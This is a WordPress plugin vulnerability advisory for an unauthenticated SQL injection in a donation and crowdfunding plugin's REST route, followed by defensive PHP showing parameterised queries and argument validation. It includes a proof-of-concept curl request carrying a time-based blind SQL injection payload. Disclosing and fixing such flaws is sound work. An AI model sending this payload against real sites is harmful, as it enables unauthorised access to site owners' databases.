WordPress Plugin Vulnerabilities
WP Fundraising Donation and Crowdfunding Platform < 1.5.0 - Unauthenticated SQLi
Description
The plugin does not sanitise and escape a parameter before using it in a SQL statement via one of its REST routes, leading to an SQL injection exploitable by unauthenticated users.
Proof of Concept
curl 'https://example.com/index.php?rest_route=/xs-donate-form/payment-redirect/3' \
  --data '{"id": "(SELECT 1 FROM (SELECT(SLEEP(5)))me)", "formid": "1", "type": "online_payment"}' \
  -X GET \
  -H 'Content-Type: application/json'
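The root cause described above is a request parameter being interpolated into SQL inside a public REST route. The following is an added example of the defensive pattern, not the plugin's own code: the route name, table and column names are hypothetical. It relies on two WordPress mechanisms that are real: per-argument validate/sanitize callbacks declared in register_rest_route(), which WordPress applies to the merged request parameters whatever their source (URL, query string, or a JSON body sent with a GET, as in the proof of concept above), and $wpdb->prepare() with %d placeholders, which binds the values so they cannot change the statement.

```php
<?php
// Added example (hypothetical route, table and columns), showing a REST route
// whose "id" parameter reaches the database only as a bound integer.
// Vulnerable pattern this replaces (do not use):
//   $wpdb->get_row( "SELECT ... WHERE id = " . $request['id'] );

add_action( 'rest_api_init', function () {
    register_rest_route( 'example-donate/v1', '/payment-redirect/(?P<form>\d+)', array(
        'methods'             => 'GET',
        // Public endpoint: authentication is not required, so input validation
        // and query parameterisation carry the full load.
        'permission_callback' => '__return_true',
        'args'                => array(
            'id'   => array(
                'required'          => true,
                // Reject anything that is not a positive integer before the
                // callback runs; the request fails with a 400 instead.
                'validate_callback' => function ( $value ) {
                    return is_numeric( $value ) && (int) $value > 0;
                },
                'sanitize_callback' => 'absint',
            ),
            'form' => array(
                'sanitize_callback' => 'absint',
            ),
        ),
        'callback'            => 'example_donate_payment_redirect',
    ) );
} );

function example_donate_payment_redirect( WP_REST_Request $request ) {
    global $wpdb;

    // Both values have already been validated and cast by the 'args' callbacks;
    // the casts here are defence in depth.
    $id   = (int) $request->get_param( 'id' );
    $form = (int) $request->get_param( 'form' );

    // $wpdb->prepare() binds the values; %d forces integers, so the user-supplied
    // "id" can never alter the SQL text (no subquery, no SLEEP(), no UNION).
    $row = $wpdb->get_row( $wpdb->prepare(
        "SELECT id, status FROM {$wpdb->prefix}example_donations WHERE id = %d AND form_id = %d",
        $id,
        $form
    ) );

    if ( ! $row ) {
        return new WP_Error( 'not_found', 'Donation not found.', array( 'status' => 404 ) );
    }

    return rest_ensure_response( array(
        'id'     => (int) $row->id,
        'status' => $row->status,
    ) );
}
```

When reviewing a plugin for this bug class, the check is mechanical: every $wpdb->query(), get_row(), get_results() or get_var() call in a REST callback should either receive the output of $wpdb->prepare() or use only constants, and every route should declare its arguments with validation rather than reading $_GET, $_POST or the raw JSON body directly.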
Classification
Type
SQLI
Miscellaneous
Original Researcher
cydave
Submitter
cydave
Verified
Yes
Timeline
Publicly Published
2022-05-11
Added
2022-05-11
Last Updated
2022-07-10